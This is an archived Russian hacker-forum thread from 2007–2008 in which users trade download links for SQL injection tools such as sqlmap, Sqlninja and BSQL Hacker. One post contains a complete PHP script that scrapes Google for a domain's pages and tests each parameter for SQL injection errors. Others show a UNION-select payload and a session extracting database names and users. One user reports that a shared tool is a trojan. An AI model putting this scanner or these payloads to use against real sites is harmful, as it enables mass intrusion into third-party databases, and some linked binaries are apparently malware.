SQL Injection Tools [Архив] - Форум АНТИЧАТ

Просмотр полной версии : SQL Injection Tools

ettee

02.04.2007, 23:22

Title: sqlmap
Author: Bernardo Damele and Daniele Bellucci, sqlmap.sourceforge.net
Type: exploit tool
download (http://www.databasesecurity.com/dbsec/sqlmap-0.3.tar.gz)

Title: SQLInjector
Author: David Litchfield, NGSSoftware
Type: exploit tool
download (http://www.databasesecurity.com/dbsec/sqlinjector.zip)

Title: Bobcat
Author: "Dave", Northern-Monkee (http://www.northern-monkee.co.uk/)
Type: exploit tool
download (http://www.northern-monkee.co.uk/projects/bobcat/bin/BobCat_Alphav0.1.zip)

Title: Automagic
Author: Gary Oleary-Steele,Sec-1 Research Labs (http://www.sec-1.com/)
Type: exploit tool
download (http://www.databasesecurity.com/dbsec/automagic.zip)

Title: HacmeBank
Author: Dinis Cruz, Owasp .Net Project (http://www.owasp.net/)
Type: exploit tool
download (http://www.databasesecurity.com/dbsec/Hacme_Bank_Setupv2.15.zip)

Title: Absinthe
Author: nummish, Xeron, 0x90.org
Type: exploit tool
download (http://www.0x90.org/releases/absinthe/)

guest3297

05.04.2007, 02:01

Ну а че русских кодреов обделили...

Horsekiller

05.04.2007, 11:59

Title: HacmeBank
Author: Dinis Cruz, Owasp .Net Project (http://www.owasp.net/)
Type: exploit tool
download (http://www.databasesecurity.com/dbsec/Hacme_Bank_Setupv2.15.zip)

Это не SQL-inj тулза, а Hackme'кс (типа крякмикса, только для киддисов).

Fugitif

01.11.2007, 17:23

BSQL Hacker v0.9

BSQL (Blind SQL) Hacker designed to exploit blind SQL injection vulnerabilities virtually in any possible database and any possible condition.

Download:

http://ferruh.mavituna.com/opensource/BSQLHacker_v09_Binary.zip

Sqlninja

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.

Download:

http://sourceforge.net/project/downloading.php?group_id=152677&use_mirror=switch&filename=sqlninja-0.2.1-r1.tgz&18045180

PRIAMOS

Powerful SQL Injector & Scanner,You can search SQL Injection vulnerabilities and inject vulnerable string to get all
Databases, Tables and Column datas with injector module.

Download:

http://www.priamos-project.com/files/PRIAMOS.v1.0.exe

ЛифчиС5СВ

01.11.2007, 20:07

ettee, посоветуй на свой взгляд получше из твоей подборки, лишним не будет =))

SWAT

02.11.2007, 00:40

норм сборка

nikoTM

02.11.2007, 02:15

а вообще самое правильно своими руками все делать..

blackybr

02.11.2007, 10:33

https://forum.antichat.ru/thread20879.html

Fugitif

11.11.2007, 18:26

SqlDumper

http://www.owasp.org/images/8/80/Sqldumper.jpg

Download:

Linux:

http://www.ictsc.it/site/IT/projects/sqlDumper/sqldumper.tar.gz

Windows:

http://www.ictsc.it/site/IT/projects/sqlDumper/sqldumper.zip

Video dimonstration:

http://www.ictsc.it/site/IT/projects/sqlDumper/sqlDumper.htm

baltazar

05.08.2008, 20:33

SQL Helper 1.0
http://imglab.cn/images/ljs47898.jpg
Cкачать (http://rapidshare.com/files/133060433/Sql_Helper.rar)

SQL & XSS error finder
http://img53.imageshack.us/img53/6576/xssrx5.jpg
Cкачать! (http://host.asqanaz.am/darak/armenia/SXF.rar)

baltazar

05.09.2008, 19:20

http://img134.imageshack.us/img134/2847/dbsmb0.jpg
Скачать! (http://rapidshare.com/files/119481236/dbex.rar.html)

DimOnOID

05.09.2008, 19:47

Спосибо за трояна!
SQL Helper 1.0
http://www.virustotal.com/ru/analisis/2dafc9437e19435ce04a1d086091c9a6

Fugitif

05.09.2008, 23:06

http://img3.imagebanana.com/img/5a8zky8r/Injv2.jpg

VirusTotal analyse:

http://www.virustotal.com/analisis/ff8498bafc3326e9400e129ba9358c84

Download:

http://rapidshare.com/files/142900562/IHv2.rar.html

warlok

08.09.2008, 04:50

<?php
set_time_limit(0);
function google($domen){
$file=file_get_contents("http://www.google.ru/ie?q=site%3A$domen&hl=ru&newwindow=1&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&num=100");
//$file=file_get_contents("http://www.google.ru/ie?q=".urlencode(trim($text))."&hl=ru&lr=&newwindow=1&btnI=I%27m+Feeling+Lucky&num=10000");
$result = array ();
$ex = array ();
$regexp = '[0-9]. <a title="(.*)" href=(.*)>(.*)<\/a>';

if (preg_match_all("/$regexp/siU", $file, $matches)) {
foreach($matches[2] as $item) {
array_push($result,$item);
}

if (is_integer(strpos($file,"&start="))) { // От 0 до 100
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=100&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 100 до 200
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=200&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 200 до 300
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=300&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 300 до 400
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=400&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 400 до 500
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=500&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 500 до 600
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=600&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 600 до 700
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=700&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 700 до 800
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=800&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 800 до 900
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=900&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 800 до 900
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=1000&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}

for ($i = 0; $i <= count($result)-1; $i++) {
if (is_integer(strpos($result[$i],"="))) {
$s=$result[$i];
$s=str_replace("&","'&",$s);
$s = $s."'";
$rx=file_get_contents($s);
if (is_integer(strpos($rx,"SQL syntax"))){
flush();
echo "<span class=\"red\">$s</span><br>";}
}}

if(count($ex)==0)
array_push($ex,"<center><b>Not found</b></center>");

return $ex;
} else return "<center><b>Not found</b></center>";
}
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SQL Inj Tester - Coded by ArxWolf, Powered by WebXakep.net - Russian</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="author" content="ArxWolf">
<style>
.red:link { color: red; font-weight: bold; text-decoration: none;}
.red:visited { color: red; font-weight: bold; text-decoration: none;}
.red:hover { color: red; font-weight: bold; text-decoration: underline;}
.red:active { color: red; font-weight: bold; text-decoration: none;}
body {
background-color: #1B1B1B;
font: normal 10px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
color: #83AACB;
font-weight: bold;
}
input,textarea,select
{font: normal 11px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
color: #B4B4B4;
background-color: #333333;
border-color: #424242;
border-left: 1px solid #0A0A0A;
border-top: 1px solid #0A0A0A;
border-right: 1px solid #2C2C2C;
border-bottom: 1px solid #2C2C2C;}
input:hover, textarea:hover, select:hover {
border-color: #B6FF48;
color: #B6FF48;}
input:focus, textarea:focus, select:hover {
border-color: #B6FF48;
color: #ffffff;}
.td {
border: 1px solid #666666;
}
</style>
</head>
<body>
<form method="post">
<table width="200" border="0" align="center" class="td">
<tr>
<td nowrap>Host [Scanning a maximum of 1000 pages]:</td>
<td><input type="text" name="tt" size="30"></td>
</tr>
<tr>
<td colspan="2"><div align="right">
<input type="submit" name="sbm" value="Run">
</div></td>
</tr>
</table>
</form>

<?php
if (isset($_POST['sbm'])){
$txt=$_POST['tt'];
if ($txt=="") die("<center><b>Empty</b></center>");
$res=google($txt);

}
?>

</body>
</html>

guest3297

08.09.2008, 05:05

перезалейте SQL и XSS error error

GlobalRave

10.09.2008, 17:44

Microsoft SQL Database Extractor Как в этой проге обозначить место с инъекцией?
Она такого плана 9999999+union+select+0,1,2,3,4,5,6,@@version+--

F1shka

14.09.2008, 23:26

Я не Славик и не Димон, но я тчто то очкую качать.....

guest3297

15.09.2008, 08:50

перезалейте SQL и XSS error finder
up

~!DoK_tOR!~

15.09.2008, 11:42

лови [ cash ] _http://rapidshare.com/files/17218785/937_SXF.rar.html

~!DoK_tOR!~

20.09.2008, 23:09

ISR-sqlget v.1.0.0

Description: ISR-sqlget: It's a blind SQL injection tool developed in Perl.
It lets you get databases schemas and tables rows.
Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

DATABASES SUPPORTED:

- IBM DB2
- Mcft SQL SERVER
- ORACLE
- POSTGRES
- MYSQL
- IBM INFORMIX
- SYBASE
- HSQLDB
- MIMER
- PERVASIVE
- VIRTUOSO
- SQLITE
- INTERBASE/YAFFIL/FIREBIRD
- H2
- MCKOI
- INGRES
- MONETDB
- MAXDB
- THINKSQL
- SQLBASE

Если не будет работать ошибка будет примерно такого вида:

Can't locate Convert/EastAsianWidth.pm in @INC (@INC contains: ./libs/ D:/Perl/site/lib D:/Perl/lib .) at connection.pm line 6
BEGIN failed--compilation aborted at connection.pm line 6.
Compilation failed in require at ISR-sqlget.pl line 30.
BEGIN failed--compilation aborted at ISR-sqlget.pl line 30.

скачиваем http://search.cpan.org/src/AUTRIJUS/Unicode-EastAsianWidth-1.02/lib/Unicode/EastAsianWidth.pm и вставляем его в папку D:\Perl\lib\Convert если папки Convert нет то создаём )

Download: _http://www.infobyte.com.ar/down/ISR-sqlget-1.0.0.tar.gz

[Raz0r]

04.12.2008, 22:37

SQL Playground 3
http://real.o-n.fr/

Описание: SQL Playground - CLI-утилита, написанная на PHP, целью которой является обеспечение удобной среды при реализации SQL-инъекций в MySQL.

Набор функций стандартный для подобного рода утилит, но интерфейс для работы со SQL-иъекциями довольно оригинальный.

Пример работы:
root ~# php sp.php

SQL Playground 3 by Charles FOL

sp# load localhost_attack

Data loaded
sp# union-configure
[+] 9 fields in the query
[+] The field #2 is displayed
[+] UNION attack successfully configured
sp# union SELECT database(), user()

database() : digitalp

user() : root@localhost

sp# exit

root ~#

Подробный мануал (http://raz0r.name/wp-content/man.html)
Скачать (http://slil.ru/26401780)

masternet

12.12.2008, 12:04

выложите какой нибудь скуль дампер